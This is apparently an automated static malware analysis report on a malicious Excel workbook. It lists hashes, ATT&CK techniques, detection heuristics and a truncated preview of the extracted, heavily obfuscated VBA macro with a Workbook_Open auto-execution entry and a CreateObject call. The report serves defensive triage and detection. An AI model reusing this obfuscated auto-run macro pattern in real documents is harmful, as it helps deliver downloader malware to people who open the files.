Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 37f2d49a003f60b5…

MALICIOUS

Office (OOXML)

29.0 KB Created: 2018-10-25 13:39:53 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2019-01-11
MD5: 823f3aba620e0cce091e2f7e7bd1af4e SHA-1: 45ade80b8f91cad0c987e25314a7024f5d2b78ee SHA-256: 37f2d49a003f60b543ad2cb9e41a2ef3975cc0468d4fe066ad8240f233b46e3b
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file is an OOXML document containing a Workbook_Open macro, which is a common technique for executing malicious code upon opening. The macro uses Shell() and CreateObject calls, indicating an attempt to run external commands or download additional payloads. The VBA code is heavily obfuscated with loops and meaningless variable names, making it difficult to determine the exact payload, but the presence of these indicators strongly suggests a downloader or dropper functionality.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 16040 bytes
SHA-256: 6789a8b48e2943ba26778fb4840193dc2d75aff5ad7a5951a0203c82cf3e8cfa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
jRWAp6Qs.v_OD1WEBp_DlR1EhICRE
While 2 = 6117
Dim CHInlMnOqPbV5XnPJaAjeRqzNXi_Waq3cTymykZ As Variant
Wend
Dim mszTYgpp3Ly As Integer
While 27 = 1181
Dim VrBqjtZRYLnh2Oii3ji_Zi_V1o7QRgqo1hD8 As Variant
Wend
Dim usDLeKL9I8_z As Integer
While 20 = 5683
Dim wESLWwqnz5vG_1e8pRKjrFzev5WwWpp2aTtkUnIOOK4xQDeSq_bn3NNo As Variant
Wend
Dim NwYaY4OIM3 As Integer

While 6 = 2847
Dim pnE3kBH5SeLAMrYC_WLB9K__VgMqzU6sjWVzLwWZe85sbLiqBUx26 As Variant
Wend
Dim K4dhAfDwZD As Integer
While 25 = 5291
Dim ibZzThyQ9veAPUlH7fodfCwXb2PKPSl_36I9vsUcef3Io3MLXVEP As Variant
Wend
Dim tiZeoAVbQm As Integer
While 22 = 8172
Dim nHZFSKlVLIK8_IlshmCw4MUSRemStV3J2fM_Mu4Au92EhkZUBQ As Variant
Wend
Dim xxMzEZwFxxgRlz As Integer
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "jRWAp6Qs"
Dim Z892dil9lCb8oG6eWbUqOpMvuorgnKbuYXwr4b_h11hLMYOFmv3SemgssKFy1DTYjqhPSMj5VwyWFAhTYk41QGOu1C8rTOqveGkfz8vXK8 As String
 Function O__c5ldvsBA4UOtqDPQag_7BYwLF7EbbVA(IESSZhVoeGASGfIXXqqOxQjxHyjMrA1Vh5QccCFgu7FSFt2UmYsDeKF1ddIk8G7dOmuKMp4UjHd1JOqX6NiRQw1Uw)
While 17 = 9288
Dim CUrVkZjtWsL9nJ1fs5z8F2tZu4ovS4LhkkEHnLW514n7lFaFiULCwP5I As Variant
Wend
Dim jQjptwZcenWBD As Integer
While 13 = 7241
Dim r2fg4FLMwxnbgL7qIuSp6gVlqICcJa8sYCzcoe2Ir6wb5LLicuT2CUG As Variant
Wend
Dim Id3ytCrBUz5BdU As Integer
While 22 = 642
Dim bAn2I79t3pc6b9YE_oD4p9uoFE94Zk_JrMAsp92 As Variant
Wend
Dim WGYjLUxjskOuN As Integer

 Dim U2Egf_U7oTKxm4qvlpA6ICI9hio_o8nSaASlF_xsVZ8NIXAxuZMMQibQqE87SOPqo2Uki_nk2Qir_5yIh1SMsZA2hB4AA1XEHPhQBYMpukT_9sLuOxXb6C7NzcBgImjA2bixVgFGmmaG_A2xxGuLb
While 7 = 9150
Dim iocN8uD8_RQoRLN8oX_wovOWhSRdOQJztKHgfdqMxXCFRf As Variant
Wend
Dim CjTt6zoaQw As Integer
While 3 = 9637
Dim XEpnahrwFa4EDpZJpz8OsHDAOrIdTTIR3THZwCvOpN91k As Variant
Wend
Dim enRuHxbADO As Integer
While 7 = 1198
Dim AnWsXLavPkLrg_VmDricILXSKdKiJTy1 As Variant
Wend
Dim P2YHnBzcvLi As Integer


   Dim qCFNwMf8v_El_6GIAf842AH8EH9Wbi9GSSp_J5SvzNhxKpMG2hsKzsGo3GHmNHdKA7RoNC8EKJClaTvX4zd4zwQiK_KCuogqtUvNWh3yim9nodMhUtrWmiULnrbMz5Sfl
While 6 = 8857
Dim svFRWdttaiEwODf3A2j5uTanjM9A1Ep6lXjY As Variant
Wend
Dim W2Jpj_Ypvk2id7a As Integer
While 24 = 7716
Dim lnMWSarIdr2U2HJ1cFdGp4Sp5t18TYe4mvS8IK_6IA As Variant
Wend
Dim J2KCwmZAEWaR As Integer
While 15 = 8216
Dim LqSfbiisx_K7rExLpQBh8orac17MgRRGb As Variant
Wend
Dim SikmlreUYK_oNT As Integer
   
While 12 = 2953
Dim qxMTwT2Tf81CjkUKeuDdWeLhChfLhcmvNfNYS8evi8CluiF3_L As Variant
Wend
Dim pRks6JknPNxovCT As Integer
While 13 = 7578
Dim wDU62fOP5XbivcZmKTwTIdiCwnqO83K_QpuCfDTHBTxfrA2vwI As Variant
Wend
Dim cZO94QcQGMy_QA As Integer
While 14 = 4145
Dim LbPEqWEG9mQypBTuu4awYtsQuchM5FRBBvS As Variant
Wend
Dim OtuDYDTakq_ja As Integer
 Set qCFNwMf8v_El_6GIAf842AH8EH9Wbi9GSSp_J5SvzNhxKpMG2hsKzsGo3GHmNHdKA7RoNC8EKJClaTvX4zd4zwQiK_KCuogqtUvNWh3yim9nodMhUtrWmiULnrbMz5Sfl = CreateObject(Z892dil9lCb8oG6eWbUqOpMvuo
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 46592 bytes
SHA-256: 0d0b2b9754222e514ce4048223fd87f46aef35f8f0f7640ba88f457d7206986e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.